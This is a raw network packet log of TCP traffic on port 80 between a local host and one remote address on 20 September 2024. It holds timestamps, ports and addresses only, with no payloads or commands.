                                                              Sep 20, 2024 12:00:10.809544086 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809551954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809572935 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809587955 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809592962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809613943 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809628010 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809633970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809654951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809669971 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809674978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809695005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809710026 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809715033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809748888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809751034 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809770107 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809792042 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809806108 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809812069 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809834003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809850931 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809854984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809876919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809892893 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809897900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809932947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809940100 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.809953928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809974909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809995890 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.809999943 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810017109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810038090 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810038090 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810060024 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810080051 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810082912 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810101032 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810122013 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810122013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810143948 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810163021 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810164928 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810184956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810204983 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810206890 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810230017 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810250044 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810250998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810281038 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810296059 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810302019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810322046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810343027 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810343027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810375929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810381889 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810408115 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810427904 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810447931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810451031 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810470104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810491085 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810491085 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810513973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810533047 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810534000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810555935 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810575008 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810576916 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810597897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810617924 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810619116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810641050 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810659885 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810661077 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810682058 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810703039 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810703039 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810724020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810744047 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810745955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810767889 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810787916 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810787916 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810808897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810828924 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810830116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810852051 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810870886 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810872078 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810904980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810918093 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810925007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810946941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810959101 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.810967922 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.810987949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811007977 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811009884 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811031103 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811043978 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811052084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811074018 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811088085 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811094046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811115026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811131001 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811135054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811156034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811173916 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811177015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811197996 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811218977 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811223030 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811239958 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811260939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811263084 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811283112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811304092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811304092 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811325073 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811348915 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811353922 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811379910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811397076 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811414003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811434984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811455011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811455011 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811475992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811496973 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811496973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811518908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811539888 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811539888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811573029 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811585903 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811594963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811614990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811630011 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811635971 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811656952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811677933 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811677933 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811700106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811717033 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811719894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811744928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811759949 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811765909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811789036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811809063 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811810017 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811830997 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811851978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811852932 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811872959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811923027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811937094 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811944008 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811964035 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.811969042 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.811985970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812005997 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812010050 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812026024 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812042952 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812047005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812068939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812083006 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812089920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812112093 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812125921 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812166929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812190056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812210083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812211037 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812231064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812247992 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812252998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812285900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812300920 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812306881 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812324047 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812340021 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812347889 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812355995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812371969 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812376022 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812387943 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812402964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812407017 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812419891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812434912 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812438965 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812450886 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812467098 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812472105 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812484026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812500000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812503099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812516928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812530994 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:10.812534094 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:10.812572002 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.210901976 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.215949059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.455508947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.456240892 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.461287975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562527895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562557936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562573910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562587976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562603951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562618971 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562652111 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562666893 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562685013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562691927 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562702894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562720060 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562733889 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562736034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562753916 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562762976 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562772036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562796116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562796116 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562813044 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562828064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562834024 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562844038 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562863111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562872887 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562877893 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562891960 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562906027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562907934 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562922955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562933922 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562938929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562954903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562962055 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562969923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.562993050 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.562998056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563014030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563029051 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563038111 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563044071 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563060045 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563072920 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563076973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563092947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563098907 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563112020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563127995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563131094 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563143969 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563159943 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563165903 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563174963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563199997 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563203096 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563215971 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563231945 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563239098 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563247919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563265085 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563271999 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563280106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563296080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563302994 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563312054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563327074 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563333988 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563343048 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563364983 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563369036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563409090 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563419104 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563426018 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563438892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563453913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563462973 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563472033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563487053 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563494921 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563512087 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563525915 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563529015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563546896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563560963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563565016 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563576937 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563592911 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563597918 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563608885 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563625097 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563631058 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563641071 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563656092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563668013 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563672066 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563687086 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563692093 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563711882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563728094 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563731909 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563745022 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563759089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563764095 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563776970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563791990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563800097 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563808918 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563822985 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563833952 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563838959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563860893 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563865900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563882113 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563894987 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563905001 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563920021 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563935041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563937902 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.563954115 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563968897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.563977003 CEST4972480192.168.2.5104.21.22.88
